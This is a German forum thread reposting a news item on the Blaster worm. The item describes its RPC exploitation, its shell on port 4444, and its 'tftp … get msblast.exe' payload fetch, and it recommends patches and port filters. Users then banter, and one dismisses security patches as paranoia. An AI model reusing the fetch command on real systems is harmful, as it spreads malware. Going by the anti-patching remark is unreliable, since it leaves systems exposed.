• Wie letztes Jahr von einigen gewünscht, hier eine Erinnerung zur Unterstützung.
  • Hallo zusammen, bitte prüft mal die im Forum hinterlegte Mail Adresse auf Aktualität. Es ist jetzt schon mehrfach passiert, dass Mails (z.B. für Benachrichtigung neuer PNs) nicht zugestellt werden konnten, weil die Konten nicht mehr existieren oder voll gelaufen sind. Danke!
  • Hallo Gast, falls du dich wunderst, wieso Bilder und Videos nicht mehr sofort angezeigt werden, schau mal hier.

Alle Schotten dicht -- W32.Blaster greift an

Alle Schotten dicht -- W32.Blaster greift an online bestellen
Fersy

Fersy

Bekanntes Mitglied
Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Einträge erzeugt:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill


Erkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darüberhinaus öffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geöffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geöffnet werden, also auf eingehende Verbindungen warten.

Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.

Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)
 
Original geschrieben von Fersy©
....Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)
Zum Vergrößern anklicken....

So'n Router ist doch ne schöne Sache. Kauft Euch einen für 40 EUR und schon interessieren Euch solche Angriffe nicht mehr. :)
 
Re: Re: Alle Schotten dicht -- W32.Blaster greift an

Original geschrieben von Franky


So'n Router ist doch ne schöne Sache. Kauft Euch einen für 40 EUR und schon interessieren Euch solche Angriffe nicht mehr. :)
Zum Vergrößern anklicken....


boah sag ma bist du besessen von deinem router das is ja nich zum aushalten

ps: der angiff hat mich ohne router auch nicht intressiert
 
komm werf ma gamevoice an udn lass usn mal ne rudne quatschen ...
ach ja, geht ja nich, router muahahah

wir wissen langsam das du router supa fidnest :rolleyes:
 
Re: Re: Re: Alle Schotten dicht -- W32.Blaster greift an

Original geschrieben von Konsolenfreak



boah sag ma bist du besessen von deinem router das is ja nich zum aushalten

ps: der angiff hat mich ohne router auch nicht intressiert
Zum Vergrößern anklicken....
jetzt hat im sein router einmal was positives gebracht. lass ihn doch freuen :D
 
benutz ich ja selber, aber die tatssache das es nich geht ... *hier bitte langer erklärung einsetzten warum DSL router fürn arsch sind*
 
Original geschrieben von Achmed20
benutz ich ja selber, aber die tatssache das es nich geht ... *hier bitte langer erklärung einsetzten warum DSL router fürn arsch sind*
Zum Vergrößern anklicken....

...aber ma ehrlich: Sobald dann wieder so'n Exploit auftaucht und ausgenutzt wird sind die Foren wieder voll von Usern die rummjammern, wie sie das wegkriegen etc. (ich meine jetzt nicht das Blaster ;)). Wenn sich die Leute vorher entweder die Patches gezogen hätten oder mal nen Router für lächerliche 40 EUR geholt hätten, müßten sie dann in so nem Fall auch nicht rumjammern und ständig fragen stellen, wie sie das Teil wieder weg kriegen.
 
Original geschrieben von Franky


...aber ma ehrlich: Sobald dann wieder so'n Exploit auftaucht und ausgenutzt wird sind die Foren wieder voll von Usern die rummjammern, wie sie das wegkriegen etc. (ich meine jetzt nicht das Blaster ;)). Wenn sich die Leute vorher entweder die Patches gezogen hätten oder mal nen Router für lächerliche 40 EUR geholt hätten, müßten sie dann in so nem Fall auch nicht rumjammern und ständig fragen stellen, wie sie das Teil wieder weg kriegen.
Zum Vergrößern anklicken....


da spare ich liebe die 40€ und mache gebrauch von meiner dsl leitung
 
ja und?
dafür siehste doch mindestens genausoviele user die schreiben

- ich habe router x wie komm ich in xbox live
- ich habe router x wieso kann ich keinen server öffnen
- mein router kackt ständig ab wenn ich mit emule sauge
etc

das behebt deine probleme nicht, das is lediglich ne problem verschiebung.
und die sicherheits patches ... wen juckt es. die zeit die ich damit verschwende mir ständig irgenwelche paranoia patches zu saugen is grösser wie die zeit die ich brauche um mal n patch zu saugen wenn ich mal wirklich n problem habe.
 
Original geschrieben von Achmed20
...und die sicherheits patches ... wen juckt es. die zeit die ich damit verschwende mir ständig irgenwelche paranoia patches zu saugen is grösser wie die zeit die ich brauche um mal n patch zu saugen wenn ich mal wirklich n problem habe.
Zum Vergrößern anklicken....

Also ich klicke 1x im Monat auf Windows-Update und mache dann noch so 5-6 Klicks. Kostet mich im Monat 1 Minute.
 
Original geschrieben von Franky


Also ich klicke 1x im Monat auf Windows-Update und mache dann noch so 5-6 Klicks. Kostet mich im Monat 1 Minute.
Zum Vergrößern anklicken....
siehste und cih mach es 1 mal alle 2-3 jahre :)

sowas wie gestern hatte ich noch nie
und selbst gestern hats mich nur 5 min gekostet.
 
Original geschrieben von Klotz
Und Battelcom is doch besser als Teamspeak und Gamevoice :mf:
Zum Vergrößern anklicken....

ist zwar OT, aber: Das war vielleicht noch vor nem Jahr so. Inzwischen ist Teamspeak deutlich besser als das Steinzeit-Battlecom (Sprachquali + Funktionalität).
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben